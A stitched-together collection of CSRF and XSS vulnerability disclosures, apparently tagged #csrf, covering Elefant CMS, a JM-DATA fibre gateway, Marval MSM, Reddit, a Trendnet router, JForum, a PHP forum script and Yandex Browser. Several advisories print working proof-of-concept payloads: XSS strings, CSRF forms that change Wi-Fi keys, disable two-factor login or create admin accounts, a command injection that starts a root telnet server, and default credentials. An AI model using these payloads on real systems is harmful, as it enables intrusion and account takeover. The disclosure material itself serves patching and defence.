The Seamless Donations WordPress plugin before 5.1.9 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1610

The Mail Subscribe List WordPress plugin before 2.1.4 does not have CSRF check in place when deleting subscribed users, which could allow attackers to make a logged in admin perform such action and delete arbitrary users from the subscribed list

CVE-2022-1603

A vulnerability has been found in Elefant CMS 1.3.12-RC and classified as problematic. This vulnerability affects unknown code of the file /admin/extended. The manipulation of the argument name with the input %3Cimg%20src=no%20onerror=alert(1)%3E leads to basic cross site scripting (Reflected). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS**

_From_: "Curesec Research Team (CRT)" <crt () curesec com>  
_Date_: Thu, 16 Feb 2017 12:23:48 +0100  

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:  Elefant CMS 1.3.12-RC
Fixed in:          1.3.13
Fixed Version      https://github.com/jbroadway/elefant/releases/tag/
Link:              elefant\_1\_3\_13\_rc
Vendor Website:    https://www.elefantcms.com/
Vulnerability      XSS
Type:
Remote             Yes
Exploitable:
Reported to        09/05/2016
vendor:
Disclosed to       02/02/2017
public:
Release mode:      Coordinated Release
CVE:               n/a (not requested)
Credits            Tim Coen of Curesec GmbH

2. Overview

Elefant is a content managment system written in PHP. In version 1.3.12-RC, it
is vulnerable to multiple persistent as well as a reflected XSS issue. This
allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass
CSRF protection.

3. Details

Persistent XSS: Username

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

The username is echoed in various locations in the administration backend
without encoding, leading to persistent XSS vulnerabilities. A user account is
required, but the registration is open by default.

Proof of Concept:

1. Register a new user (the registration is open by default). 2. Update the
profile, as name use: Username<img src=no onerror=alert(1)> To trigger the
payload: 1. Log in as admin 2. View the edit page for the user, for example:
http://localhost/user/edit?id=3 Alternatively, the payload is also echoed on
the page listing all users: http://localhost/admin/versions?id=&type=User As
well as on the version page: http://localhost/admin/versions?type=User&id=3

Persistent XSS: Version Comparison

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Various fields of various components are echoed unencoded when comparing
versions of those components. Examples are the user profile fields Name,
Address, Address 2, City, Title, Company, or About, or the Title, Menu Title,
Window Title, Description, or Keyword of a page.

Proof of Concept:

The comparison page can for example be seen here: http://localhost/admin/
compare?id=8&current=no

Persistent XSS: Page & Content Block

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title of a new webpage is echoed unencoded, leading to persistent XSS. The
same issue also exists when creating blocks.

A user account with the right to create pages is required. By default, the
editor role has this right.

Proof of Concept:

Create a new page or block, as title use: </title><img src=no onerror=alert(1)>
The payload will be echoed in a title tag as well as a h1 tag when viewing the
page and when editing the page.

Persistent XSS: Blog Post

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title as well as the tags of a blog post are echoed unencoded, leading to
persistent XSS.

A user account with the right to create pages is required. By default, the
editor role has this right

Proof of Concept:

Create a new blog post, as title and tag use: </title>'"><img src=no onerror=
alert(1)> The payload will be echoed in a title tag, a h1 tag, as well as a
href tag when viewing the page and when editing the page.

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The name parameter of the custom fields component is vulnerable to reflected
XSS.

Proof of Concept:

GET /admin/extended?extends=User&name=%3Cimg%20src=no%20onerror=alert(1)%3E
HTTP/1.1

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Multiple-Persistent-and-Reflected-XSS-191.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS** _Curesec Research Team (CRT) (Feb 16)_

CVE-2017-20061: Multiple Persistent and Reflected XSS

JM-DATA ONU JF511-TV versions 1.0.67, 1.0.62, and 1.0.55 suffer from cross site request forgery, persistent cross site scripting, default credential, and open redirection vulnerabilities.

  
JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities

Vendor: JM-DATA GmbH  
Product web page: https://www.jm-data.at  
Affected version: 1.0.67  
                  1.0.62  
                  1.0.55

Summary: This ONU is the perfect GEPON home and business gateway.  
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND  
and COMBINED.

Desc: The device suffers from multiple vulnerabilities including:  
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Tested on: Boa/0.93.15

Vulnerability discovered by Neurogenesia  
                            @zeroscience

Advisory ID: ZSL-2022-5708  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php

24.04.2022

--

Default credentials:  
--------------------  
user:user

Stored XSS / HTML Injection:  
----------------------------  
<html>  
  <body>  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="url" value="'><script>alert(document.cookie)</script>' />  
      <input type="hidden" name="action" value="ad" />  
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>  
  </body>  
</html>

CSRF (delete IP entry filter):  
------------------------------  
<html>  
  <body>  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="bcdata" value="ld3:idxi0eee" />  
      <input type="hidden" name="action" value="rm" />  
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>

    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="urlfilterEnble" value="off" />  
      <input type="hidden" name="action" value="rm" />  
      <input type="hidden" name="bcdata" value="ld3:idxi0eed3:idxi1eee" />  
      <input type="hidden" name="submit-url" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>  
  </body>  
</html>

Open Redirect:  
--------------  
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk

common.js:  
----------  
/*  
 * isCharUnsafe - test a character whether is unsafe  
 * @c: character to test  
 */  
function isCharUnsafe(c)  
{  
  var unsafeString = "\"\\`\+\,='\t";

  return unsafeString.indexOf(c) != -1  
    || c.charCodeAt(0) <= 32  
    || c.charCodeAt(0) >= 123;  
}

/*  
 * isIncludeInvalidChar - test a string whether includes invalid characters  
 * @s: string to test  
 */  
function isIncludeInvalidChar(s)  
{  
  var i;

  for (i = 0; i < s.length; i++) {  
    if (isCharUnsafe(s.charAt(i)) == true)  
      return true;  
  }

  return false;  
}

JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect

Marval MSM version 14.19.0.12476 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY# 2FA Bypass:<html>  <body>    <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">      <input type="submit" value="Submit request" />    </form>  </body></html>

Marval MSM 14.19.0.12476 Cross Site Request Forgery

Mischievous hackers exploiting flaw could subvert ‘not safe for work’ restrictions

Jessica Haworth 17 June 2022 at 15:26 UTC

Mischievous hackers exploiting flaw could subvert ‘not safe for work’ restrictions

  

A cross-site request forgery (CSRF) vulnerability in Reddit forced users to view adult content.

The medium severity security bug disabled the option to turn on certain settings, meaning that any user who has opted to restrict adult content could instead be directed towards it by malicious hackers.

A bug report reads: “A state-changing POST request to https://old.reddit.com/over18? lacked proper modhash validator leaving the sensitive action vulnerable to CSRF attacks. An attacker can trick users into executing the action, enabling/disabling ‘I am over eighteen years old’ and willing to view adult content preference in the victim account.”

Read more of the latest bug bounty news

  
The reproduction steps begin with a victim creating a Reddit account, navigating to https://old.reddit.com/prefs/ and turning off the option declaring the user is over 18 years old and willing to view adult content.

Next, the user visits the ‘not safe for work’ (NSFW) subreddit https://www.reddit.com/r/<nsfw\_subreddit\_here> where there is a window asking if the user wants to see adult content.

If they then open a crafted HTML file of malicious content, their settings will be updated and they will, unwittingly, be able to view NSFW content.

The issue was patched and the security researcher received a $500 bug bounty reward for reporting it.

More technical details can be found in the HackerOne write-up.

YOU MAY ALSO LIKE French government launches private bug bounty program for identity authentication app

Reddit patches CSRF vulnerability that forced users to view NSFW content

An issue was found on TRENDnet TEW-831DR 1.0 601.130.1.1356 devices. An OS injection vulnerability exists within the web interface, allowing an attacker with valid credentials to execute arbitrary shell commands.

The Trendnet TEW-831DR WiFi Router was found to have multiple vulnerabilities exposing the owners of the router to potential intrusion of their local WiFi network and possible takeover of the device.

Five vulnerabilities were discovered. Below are links to the associated technical advisories:

*   Technical Advisory: Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)
*   Technical Advisory: Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)
*   Technical Advisory: OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)
*   Technical Advisory: CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)
*   Technical Advisory: Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)

Technical Advisories:

**Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30326  
Severity: Medium 5.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the network pre-shared key field on the web interface is vulnerable to XSS.

**Impact**

An attacker can use a simple XSS payload to crash the main page of the router web interface.

**Details**

Stored XSS is a vulnerability related to improper validation of user input and output. In stored XSS the web interface accepts input from the user and stores it for later without proper encoding. A web application that is vulnerable to XSS allows an attacker to send a malicious script to the user.

The example below will crash the basic\_conf page and create a popup on the 5G home.htm page:

    <input type="text" name="pskValue0" id="pskValue0" size="30" maxlength="64" value="<script>alert(1)</script>">

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30328  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the router web interface has an insecure username and password setup.

**Impact**

A malicious user can change the username and password of the interface.

**Details**

The username and password setup for the router web interface does not require entering the existing password. An attacker can use CSRF to trick the user to send a request to the web interface to change the username and password of the router.

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners should logout of the device web interface after use.

**OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30329  
Severity: Medium 6.3

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that commands could be injected into the diagnostics field within the web interface.

**Impact**

An OS injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to execute arbitrary shell commands.

**Details**

The web interface has a diagnostics page that uses ping/traceroute. In the host(domain) an attacker can enter an IP with a ; at the end and inject a command to be executed by the device. Using command injection telnetd can be enabled. Telnetd is a remote terminal protocol server.

For example, the following can be entered into the host(domain) to enable telnetd:

    192.168.10.02;telnetd &

After running the command, any telnet client can be used to login to the root account from the local area network (LAN):

    user: root
    Password: the admin password 

Running the ls command will list the files in the current directory:

    bin   etc   init  mnt   root  tmp   var
    dev   home  lib   proc  sys   usr   web

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30327  
Severity: High 7.6

**Summary**

Trendnet TEW-831DR WiFi router is a general consumer WiFi router with a web interface for configuration. It was found that the routers browser interface is vulnerable to CSRF.

**Impact**

The WiFi router interface is vulnerable to CSRF. An attacker can change the pre-shared key to the WiFi router if the interface IP is known.

**Details**

Cross-Site Request Forgery is an attack that occurs when a user interacts with a malicious web application while logged into a vulnerable web application using the same browser. The malicious web application can send unwanted requests to the vulnerable web application.

If the user is logged into the router web interface an attacker could create a page like the example below and trick a user into clicking it to change the router WiFi pre-shared key or SSID.

e.g.:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.10.1/boafrm/formWizard" method="POST">
    
          <input type="hidden" name="pskValue0" value="password" />
          <input type="hidden" name="pskValue1" value="password" />
          <input type="hidden" name="cliPskValue0" value="password" />
          <input type="hidden" name="cliPskValue1" value="password" />
          <input type="hidden" name="apply" value="Save &amp; Apply" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30325  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the default pre-shared key for the WiFi networks is the same for every router but the last four digits.

**Impact**

The device default pre-shared key for both 2.4GHz and 5GHz networks can be guessed or brute-forced by an attacker within range of the WiFi network. The weak pre-shared key allows the attacker to gain access to these networks if the pre-shared key has been left unchanged from the factory default.

**Details**

The device default pre-shared key has the same seven out of eleven digits for every router. An attacker within scanning range of the WiFi network can brute-force the last four digits to gain access to the network.

e.g.:

    The first seven default characters of the pre-shared key:
    831R100

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners that are still using the default pre-shared key should update the current wifi key to new one through the web interface.

**Disclosure Timeline:**

March 15th, 2022: Initial email from NCC to Trendnet.

March 16th, 2022: Trendnet responded to the initial email.

March 18th, 2022: First communication of the bugs to Trendnet. Set the disclosure timeline to 60 days.

May 5th – May 23rd, 2022: Multiple emails exchanged to complete the fixes on the firmware version.

May 23rd, 2022: Trendnet confirmed the fixes were present in the firmware to be released.

June 2nd, 2022 – Trendnet released firmware version:v1.0(601.130.1.1410).

**Thanks to**

Nicolas Bidron, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process. Additionally, Trendnet for their on going cooperation.

**About NCC Group**

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

CVE-2022-30329: Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)

JForum v2.8.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via http://target_host:port/jforum-2.8.0/jforum.page, which allows attackers to arbitrarily add admin accounts.

**New and changed features in JForum 2.8.1**

Information about upgrading from JForum version 2.8.0 to 2.8.1 can be found at Upgrading to JForum 2.8.1

**New Features and fixes**

*   fixed CSRF vulnerability
*   more control over image attachments from _Configurations_ page
*   various font and background colors can be configured from the _Configurations_ page
*   optimize _Recent Topics_ and _Hot Topics_ for large installations
*   fixed issue where the _last visited time_ on the forum home page was not actually reflecting that, but the time of the last session start
*   switch Google Analytics integration from analytics.js to gtag.js

**Libraries**

*   updated Apache Lucene from 8.10.1 to 8.11.1
*   updated Apache PDFBox from 2.0.24 to 2.0.26
*   updated EventBus from 3.2.0 to 3.3.1
*   updated JDOM2 from 2.0.6 to 2.0.6.1
*   updated JSoup from 1.14.3 to 1.15.1
*   updated Microsoft SQLServer driver from 9.4.0 to 10.2.1
*   updated MySQL driver from 8.0.27 to 8.0.29
*   updated Oracle driver from 21.3.0.0 to 21.5.0.0
*   updated PrettyTime from 5.0.2 to 5.0.3
*   updated PostgreSQL driver from 42.3.1 to 42.3.6
*   updated slf4j from 1.7.32 to 1.7.36
*   added YAUAA 7.1.0 (instead of pieroxy) for user agent detection
*   updated several Maven plugins

**New Configurations**

Entry name

Default value

Description

attachments.images.thumb.hover.show

false

Whether to show the full-sized image as a popup when hovering over an image thumbnail. This causes all images to be downloaded in full size - which may not be wanted.

color.orange

#ffa34f

Orange font color

color.darkblue

#01336b

Dark blue font color

color.lightgray

#dee3e7

Light gray background color

color.verylight

#fafafa

Very light background color

color.quitelight

#f7f7f7

Quite light background color

**Database Schema**

These indexes speed up operations on large JForum installation, but are optional.

CREATE INDEX idx\_topics\_views ON jforum\_topics(topic\_views);  
CREATE INDEX idx\_topics\_replies ON jforum\_topics(topic\_replies);

CVE-2022-26173: JForum2 / Wiki / NewFeatures281

An issue in the save_users() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily create or update user accounts.

**CVE-2022-31294**

Online Discussion Forum Site 1.0 - Account Takeover

**Exploit Title: Online Discussion Forum Site 1.0 - CSRF Create New/Update Existing Admin User _\[Account Takeover\]_****Date: 2022-06-13****CVE: CVE-2022-31294****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu**

\[#\] Vulnerability Location: function save_users() in /odfs/classes/Users.php:13

\[#\] Exploitation: <form action="http://localhost/odfs/classes/Users.php?f=save" method="post" id="manage-user">	 <input type="text" name="id" value="" placeholder="Keep empty if you want to create new user / put user ID to edit existing user"> <div class="form-group"> <label for="name">First Name</label> <input type="text" name="firstname" id="firstname" class="form-control" value="" required> </div> <div class="form-group"> <label for="name">Middle Name</label> <input type="text" name="middlename" id="middlename" class="form-control" value=""> </div> <div class="form-group"> <label for="name">Last Name</label> <input type="text" name="lastname" id="lastname" class="form-control" value="" required> </div> <div class="form-group"> <label for="username">Username</label> <input type="text" name="username" id="username" class="form-control" value="" required  autocomplete="off"> </div> <div class="form-group"> <label for="password"> Password</label> <input type="password" name="password" id="password" class="form-control" value="" autocomplete="off"> </div> <div class="form-group"> <label for="type" class="control-label">Type</label> <select name="type" id="type" class="form-control form-control-sm rounded-0" required> <option value="1" >Administrator</option> <option value="2" >Registered User</option> </select> </div> <button type="submit">Save</button> </form>

CVE-2022-31294: GitHub - bigzooooz/CVE-2022-31294: Online Discussion Forum Site 1.0 - Account Takeover

Local privilege vulnerability in Yandex Browser for Windows prior to 22.3.3.801 allows a local, low privileged, attacker to execute arbitary code with the SYSTEM privileges through manipulating temporary files in directory with insecure permissions during Yandex Browser update process.

Security WiFi bypass in Yandex Browser from version 15.10 to 15.12 allows remote attacker to sniff traffic in open or WEP-protected wi-fi networks despite of special security mechanism is enabled.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 15.12.0 to 16.2 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 16.7 to 16.9 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

CSRF of synchronization form in Yandex Browser for desktop before version 16.6 could be used by remote attacker to steal saved data in browser profile.

XSS in Yandex Browser BookReader in Yandex browser for desktop for versions before 16.6. could be used by remote attacker for evaluation arbitrary javascript code.

XSS in Yandex Browser Translator in Yandex browser for desktop for versions from 15.12 to 16.2 could be used by remote attacker for evaluation arbitrary javascript code.

Yandex Browser for iOS before 16.10.0.2357 does not properly restrict processing of facetime:// URLs, which allows remote attackers to initiate facetime-call without user's approval and obtain video and audio data from a device via a crafted web site.

Yandex Browser for desktop before 17.1.1.227 does not show Protect (similar to Safebrowsing in Chromium) warnings in web-sites with special content-type, which could be used by remote attacker for prevention Protect warning on own malicious web-site.

Yandex Browser before 16.9.0 allows remote attackers to spoof the address bar via window.open.

Race condition issue in Yandex Browser for Android before 17.4.0.16 allowed a remote attacker to potentially exploit memory corruption via a crafted HTML page.

Yandex Browser installer for Desktop before 17.4.1 has a DLL Hijacking Vulnerability because an untrusted search path is used for dnsapi.dll, winmm.dll, ntmarta.dll, cryptbase.dll or profapi.dll.

Yandex Browser before 20.8.4 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite before 20.10.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android before 21.1.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android prior to version 21.1.0 allows remote attackers to cause a denial of service.

Kirtikumar Anandrao Ramchandani

Yandex Browser for Android prior to version 21.3.0 allows remote attackers to perform IDN homograph attack.

Kirtikumar Anandrao Ramchandani

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.5.0.826.

An elevation of privilege vulnerability exists in Yandex Browser prior to 21.9.0.390.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.801.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.684.

Tag

#csrf